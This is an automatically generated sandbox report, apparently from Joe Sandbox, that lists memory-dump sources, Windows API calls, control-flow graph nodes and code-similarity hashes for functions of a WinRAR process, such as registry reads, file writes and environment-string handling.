                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 869497890-0
                                                                                                                                                                                                                                                • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                                • Instruction ID: 2e96f47680370fba962d3756f8d4cb04f02d37bbb433f5249bf4735dddb35ff9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E41D732708A91A6EA25AF26E4902E8B360FB497B4F840331EABD437C5DF6DD5558710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 751630497-0
                                                                                                                                                                                                                                                • Opcode ID: ef7c9165b4ea038a72c4a70b654b31603e9aaa745bc893fac2e55cf26434fa8d
                                                                                                                                                                                                                                                • Instruction ID: 00018e6d9032bbdc84a2e291077ddf2e22cc3e538a8a348475c08194709e80e2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef7c9165b4ea038a72c4a70b654b31603e9aaa745bc893fac2e55cf26434fa8d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A722C532E086A295E714EF32D4A41FDFBA0FB50758F8C8031DA4D87699DE7AE941C760

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF75428495D,?,?,?,00007FF754277E7D), ref: 00007FF7542847DB
                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF75428495D,?,?,?,00007FF754277E7D), ref: 00007FF754284831
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF75428495D,?,?,?,00007FF754277E7D), ref: 00007FF754284853
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF75428495D,?,?,?,00007FF754277E7D), ref: 00007FF7542848A6
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                                                                                • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                                                                                                                                                                • API String ID: 1800380464-3408810217
                                                                                                                                                                                                                                                • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                                • Instruction ID: 614674e6fb213889dd8a2481820b0b8c32db1da09baae30b932bb1ebd4ac26ff
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE31C322B18B9141FB60EF62E8A02BEA350FF88794F844231EE4D47B99EF6DD544C710

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1858 7ff754262574-7ff75426259c 1859 7ff75426259e-7ff7542625a0 1858->1859 1860 7ff7542625a5-7ff7542625a9 1858->1860 1861 7ff75426273a-7ff754262756 1859->1861 1862 7ff7542625ab-7ff7542625b6 GetStdHandle 1860->1862 1863 7ff7542625ba-7ff7542625c6 1860->1863 1862->1863 1864 7ff7542625c8-7ff7542625cd 1863->1864 1865 7ff754262619-7ff754262637 WriteFile 1863->1865 1866 7ff754262644-7ff754262648 1864->1866 1867 7ff7542625cf-7ff754262609 WriteFile 1864->1867 1868 7ff75426263b-7ff75426263e 1865->1868 1870 7ff754262733-7ff754262737 1866->1870 1871 7ff75426264e-7ff754262652 1866->1871 1867->1866 1869 7ff75426260b-7ff754262615 1867->1869 1868->1866 1868->1870 1869->1867 1872 7ff754262617 1869->1872 1870->1861 1871->1870 1873 7ff754262658-7ff754262692 GetLastError call 7ff754263144 SetLastError 1871->1873 1872->1868 1878 7ff7542626bc-7ff7542626d0 call 7ff75425c95c 1873->1878 1879 7ff754262694-7ff7542626a2 1873->1879 1885 7ff7542626d2-7ff7542626db 1878->1885 1886 7ff754262721-7ff75426272e call 7ff75425cf14 1878->1886 1879->1878 1881 7ff7542626a4-7ff7542626ab 1879->1881 1881->1878 1882 7ff7542626ad-7ff7542626b7 call 7ff75425cf34 1881->1882 1882->1878 1885->1863 1888 7ff7542626e1-7ff7542626e3 1885->1888 1886->1870 1888->1863 1889 7ff7542626e9-7ff75426271c 1888->1889 1889->1863
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3350704910-0
                                                                                                                                                                                                                                                • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                                • Instruction ID: 9ea54360541f49991f405e2e129960d18bb4890c3cfa635fd63ee955de25f109
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 025187266086A196EA68FF27E4A4379E360FB49B84F8C4135DE4E46690CF3DD445CB21
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF7542A3CEF,?,?,00000000,00007FF7542A3CAA,?,?,00000000,00007FF7542A3FD9), ref: 00007FF7542A97A5
                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7542A3CEF,?,?,00000000,00007FF7542A3CAA,?,?,00000000,00007FF7542A3FD9), ref: 00007FF7542A9807
                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7542A3CEF,?,?,00000000,00007FF7542A3CAA,?,?,00000000,00007FF7542A3FD9), ref: 00007FF7542A9841
                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7542A3CEF,?,?,00000000,00007FF7542A3CAA,?,?,00000000,00007FF7542A3FD9), ref: 00007FF7542A986B
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1557788787-0
                                                                                                                                                                                                                                                • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                                                • Instruction ID: e8bb201729ba6cce79bf0ef69a8be5ff4fe66e39cbd63c578b448f0fb66d308c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F621C522F0876185E620AF13A49012DE6A4FB48FE0F8C4635DE9E23B94DF7DD8528714
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                                • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                                • Instruction ID: 3f1a52b5e6f1e11e1ceff5c3f3ff6000a05e7b0d4b7f63b32d8eb8a4bc1a42ee
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8021D123E0876240EB649F2794F0139A654EB45B70F6C9335DAAE077D4CF7EE881C210
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 932687459-0
                                                                                                                                                                                                                                                • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                                • Instruction ID: a35c029cbef2487216c0bc08669bb747f54053bfe30e3f5332530811f9928b68
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03218463D08F9582DB019F2AD5910B86360FB98B88F58E321DF9D43656EF29E5E58300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6415d06f8006144dc1d0689d5df6806aea5b85874021d19cae4450d81380496d
                                                                                                                                                                                                                                                • Instruction ID: a0edfaead35325fd3e9d4307995b1e29371521a95e8130e7824bcac074610c71
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6415d06f8006144dc1d0689d5df6806aea5b85874021d19cae4450d81380496d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E118131509B9181EA00BF66A9A43A9F2E4FF84790FA84634D69D077E6DE79D0618360
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5dc5ec8cd6c4596df62870985cb321f9a7caf6a31d95500942cea3766e9a513d
                                                                                                                                                                                                                                                • Instruction ID: f21dc2be86dc486d63abc2150f1ba220d6ef44b675a61aeda13751f8c2aa7cae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dc5ec8cd6c4596df62870985cb321f9a7caf6a31d95500942cea3766e9a513d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00E1D521A0C7A241FB20BF2298E42BDE751EF91B88F8C4135DD4D9B7D6DE2EA445C721
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                                                                                • Opcode ID: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
                                                                                                                                                                                                                                                • Instruction ID: fcc8d4e6d9f4cfda7d0f85470fdafad40778dca63d8de54de8e2e4a66f593fc0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79F0F9219082D151DB11AF7650912F8B751AF16BF8F4C4334DEBD0B2C7CE5E90848B30
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
